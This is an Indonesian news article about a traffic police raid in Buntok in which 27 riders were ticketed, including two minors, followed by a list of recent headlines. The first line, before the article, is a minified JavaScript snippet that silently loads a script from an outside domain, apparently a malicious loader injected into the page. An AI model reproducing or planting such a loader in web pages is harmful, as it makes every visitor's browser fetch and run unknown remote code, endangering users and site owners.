(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');

27 Pelanggar Kena Tilang Polres Barsel, 2 Anak di Bawah Umur Ikut Terjaring


BUNTOK, Sebanyak 27 pelanggar terjaring razia yang dilaksanakan Satlantas Polres Barito Selatan di jalan Pahlawan dan jalan Pelita Raya, Kamis (10/10) sekitar pukul 15.30 WIB.

Kasat Lantas Polres Barsel, AKP Feriza Winda Lubis mengatakan, razia yang dilakukan ini meliputi pemeriksaan kelengkapan surat menyurat kendaraan bermotor hingga persyaratan pengemudi.
“Jadi razia kali ini meliputi pemeriksaan kelengkapan surat menyuray dalam berkendara,” kata Feriza kepada Kanalkalimantan.com, usai razia.

Ia juga mengatakan, dalam giat kali ini ada sebanyak 21 personil terdiri dari Satlantas Polres Barsel bersama dengan, Dansubdenpom beserta anggota, Dinas Pendapatan, Jasa Raharja dan Provost Polres Barsel.

“Kita melakukan penindakan kepada pelanggar yang terjaring berupa tilang kepada pengemudi atau pengendara kendaraan bermotor,” ucap Feriza.

Ia mengungkapkan, hasil giat yang dilaksanakan sebanyak 27 pengendara yang melanggar terjaring razia ditindak dengan tilang di tempat. Dengan rincian pengendara di bawah umur 2 orang, tidak menggunakan helm sebanyak 6 orang dan tanpa kelengkapan surat menyurat 19 kendaraan.

Ditambahkan olehnya terkait barang bukti yang disita, ada sebanyak 16 Surat Izin Mengemudi (SIM), STNK 10 lembar, dan kendaraan bermotor 1 unit.

“Dari 27 pengendara yang kita ditilang, jenis kendaraan sepeda motor sebanyak 24 pelanggar, mobil penumpang 2 pelanggar dan mobil barang 1 pelanggar,” beber Feriza.
Ia pun mengimbau kepada pengendara saat hendak berpergian agar memperhatikan kelengkapan kendaraan dan persyaratan pengemudinya.
“Karena hal itu salah satu cara agar menimalisir kecelakaan di Jalan Raya,” tandas Feriza.(digdo)

Reporter : Digdo
Editor : Bie

 


Desy Arfianty

Recent Posts

Diberi Waktu Tiga Bulan, Peternakan Babi di Jalan Pandarapan Harus Dibongkar

KANALKALIMANTAN.COM, BANJARBARU – Sebanyak 21 kepala keluarga (KK) pemilik peternakan babi di Jalan Pandarapan RT… Read More

11 jam ago

Upacara Ritual Adat Mamapas Lewu di Desa Penda Ketapi

KANALKALIMANTAN.COM, KUALA KAPUAS - Warga Desa Penda Ketapi, Kecamatan Kapuas Barat, Kabupaten Kapuas, Kalteng, menggelar… Read More

11 jam ago

Penyuluhan Kesehatan Satgas TMMD di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Satgas TNI Manunggal Membangun Desa (TMMD) menggelar sosialisasi penyuluhan kesehatan masyarakat di… Read More

11 jam ago

Terbagi Tiga Kloter, Pj Bupati Kapuas Ingatkan Calon Haji Jaga Kondisi Kesehatan

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi melepas ratusan jemaah calon haji… Read More

11 jam ago

81 Peserta Ikuti Audisi Pemilihan Nanang dan Galuh Kabupaten Banjar

KANALKALIMANTAN.COM, MARTAPURA - Sebanyak 81 orang terdiri atas 27 laki-laki dan 54 perempuan dari beberapa… Read More

11 jam ago

Rumah di Banjarmasin Ambruk ke Sungai, Penghuni Keluar Lewat Jendela

KANALKALIMANTAN.COM, BANJARMASIN - Sebuah rumah di Jalan Sutoyo S, Gang Serumpun, Kelurahan Pelambuan, Kecamatan Banjarmasin… Read More

12 jam ago

This website uses cookies.